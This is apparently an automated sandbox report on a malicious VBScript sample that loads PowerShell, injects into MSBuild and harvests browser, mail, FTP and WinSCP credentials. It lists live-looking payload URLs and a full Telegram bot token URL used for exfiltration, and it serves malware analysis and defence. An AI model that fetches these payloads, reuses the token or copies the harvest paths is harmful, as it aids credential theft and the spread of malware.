                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5684, type: MEMORYSTR
                      Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5684, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5684, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5684, type: MEMORYSTR
                      Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5684, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information221
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      221
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      311
                      Process Injection
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts11
                      Command and Scripting Interpreter
                      Logon Script (Windows)Logon Script (Windows)1
                      Software Packing
                      Security Account Manager111
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login HookLogin Hook1
                      DLL Side-Loading
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                      Process Injection
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430755 Sample: Reconfirm Details.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 34 paste.ee 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 58 14 other signatures 2->58 9 wscript.exe 14 2->9         started        signatures3 54 Connects to a pastebin service (likely for C&C) 34->54 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 dnsIp5 42 paste.ee 104.21.84.67, 443, 49704 CLOUDFLARENETUS United States 9->42 70 System process connects to network (likely due to code injection or exploit) 9->70 72 VBScript performs obfuscated calls to suspicious functions 9->72 74 Suspicious powershell command line found 9->74 76 5 other signatures 9->76 13 powershell.exe 7 9->13         started        signatures6 process7 signatures8 78 Suspicious powershell command line found 13->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 13->80 16 powershell.exe 14 15 13->16         started        20 conhost.exe 13->20         started        process9 dnsIp10 30 mhsonsco.com 103.83.81.68, 443, 49707 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN India 16->30 32 uploaddeimagens.com.br 172.67.215.45, 443, 49705, 49706 CLOUDFLARENETUS United States 16->32 44 Writes to foreign memory regions 16->44 46 Injects a PE file into a foreign processes 16->46 22 MSBuild.exe 15 2 16->22         started        26 MSBuild.exe 16->26         started        28 MSBuild.exe 16->28         started        signatures11 process12 dnsIp13 40 api.telegram.org 149.154.167.220, 443, 49710 TELEGRAMRU United Kingdom 22->40 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->60 62 Tries to steal Mail credentials (via file / registry access) 22->62 64 Tries to harvest and steal ftp login credentials 22->64 66 Tries to harvest and steal browser information (history, passwords, etc) 22->66 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->68 signatures14

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Reconfirm Details.vbs14%VirustotalBrowse
                      Reconfirm Details.vbs5%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      bg.microsoft.map.fastly.net0%VirustotalBrowse
                      uploaddeimagens.com.br7%VirustotalBrowse
                      mhsonsco.com12%VirustotalBrowse
                      fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://uploaddeimagens.com.br/images/004/773/797/original/P0%Avira URL Cloudsafe
                      https://www.google.com;0%Avira URL Cloudsafe
                      https://mhsonsco.com/ab/hon.txt0%Avira URL Cloudsafe
                      https://lesferch.github.io/DesktopPic0%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br0%Avira URL Cloudsafe
                      https://lesferch.github.io/DesktopPic0%VirustotalBrowse
                      https://uploaddeimagens.com.br7%VirustotalBrowse
                      https://analytics.paste.ee;0%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?17138820290%Avira URL Cloudsafe
                      https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                      https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?17138820295%VirustotalBrowse
                      https://mhsonsco.com/ab/hon.txt17%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalseunknown
                      paste.ee
                      104.21.84.67
                      truefalse
                        high
                        uploaddeimagens.com.br
                        172.67.215.45
                        truetrueunknown
                        api.telegram.org
                        149.154.167.220
                        truefalse
                          high
                          mhsonsco.com
                          103.83.81.68
                          truetrueunknown
                          fp2e7a.wpc.phicdn.net
                          192.229.211.108
                          truefalseunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocumentfalse
                            high
                            https://mhsonsco.com/ab/hon.txttrue
                            • 17%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://paste.ee/d/IKfbDfalse
                              high
                              https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029true
                              • 5%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://uploaddeimagens.com.br/images/004/773/797/original/Ppowershell.exe, 00000002.00000002.2573305651.0000020D3FBC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://account.dyn.com/MSBuild.exe, 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgMSBuild.exe, 00000007.00000002.3315094213.0000000003296000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    • URL Reputation: malware
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.google.com;wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://paste.ee/d/IKfbDJwscript.exe, 00000000.00000003.2043824616.000002B954A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046396149.000002B954A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043903240.000002B954A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043790050.000002B954A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://analytics.paste.eewscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://aka.ms/pscore6powershell.exe, 00000002.00000002.2512757575.0000020D27971000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://paste.ee/d/IKfbDuserwscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.comwscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://lesferch.github.io/DesktopPicwscript.exe, 00000000.00000003.2043378008.000002B956753000.00000004.00000020.00020000.00000000.sdmp, Reconfirm Details.vbsfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://uploaddeimagens.com.brpowershell.exe, 00000004.00000002.2192954953.0000014280223000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • 7%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2481321303.000001429006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://paste.ee/wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://analytics.paste.ee;wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      https://paste.ee/d/IKfbD-wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://paste.ee/d/IKfbDmwscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2512757575.0000020D2798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2192954953.0000014280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://paste.ee/d/IKfbD)wscript.exe, 00000000.00000003.2041706715.000002B957040000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/MSBuild.exe, 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://api.telegram.orgMSBuild.exe, 00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2512757575.0000020D279BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2192954953.0000014280001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3315094213.0000000003296000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://secure.gravatar.comwscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://themes.googleusercontent.comwscript.exe, 00000000.00000003.2044763280.000002B9568A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          103.83.81.68
                                                                          mhsonsco.comIndia
                                                                          138251ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdINtrue
                                                                          104.21.84.67
                                                                          paste.eeUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.67.215.45
                                                                          uploaddeimagens.com.brUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1430755
                                                                          Start date and time:2024-04-24 06:47:21 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 55s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Reconfirm Details.vbs
                                                                          Detection:MAL
                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winVBS@12/6@4/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 63
                                                                          • Number of non-executed functions: 3
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .vbs
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 52.165.165.26, 23.56.109.197, 72.21.81.240, 192.229.211.108, 20.242.39.171
                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                          • Execution Graph export aborted for target powershell.exe, PID 360 because it is empty
                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          TimeTypeDescription
                                                                          06:48:14API Interceptor45x Sleep call for process: powershell.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220X1.exeGet hashmaliciousXWormBrowse
                                                                            Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                                HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                      z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          z0LTqIdZ4A.exeGet hashmaliciousXWormBrowse
                                                                                            z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              103.83.81.68Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                  Price Quotation_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                    DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                      BBL ADVICE FOR INWARD_BC I650120-000_04012024.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                        EUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                                                                          104.21.84.67Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • paste.ee/d/u4bvR
                                                                                                          rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                          • paste.ee/d/SDfNF
                                                                                                          Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/enGXm
                                                                                                          Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/wXm0Y
                                                                                                          SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/eA3FM
                                                                                                          dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/JZHbW
                                                                                                          P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/kmRFs
                                                                                                          comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • paste.ee/d/cJo7v
                                                                                                          RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/EgkAG
                                                                                                          87645345.vbsGet hashmaliciousXWormBrowse
                                                                                                          • paste.ee/d/IJGyf
                                                                                                          172.67.215.4572625413524.vbsGet hashmaliciousXWormBrowse
                                                                                                            Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                  Payment Advice for Invoice 2024 0904.vbsGet hashmaliciousFormBookBrowse
                                                                                                                    TNT Invoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      DHL Shipping Documents_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                        P.O.109961.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtfGet hashmaliciousRemcosBrowse
                                                                                                                            SOA APR24.xlsGet hashmaliciousRemcosBrowse
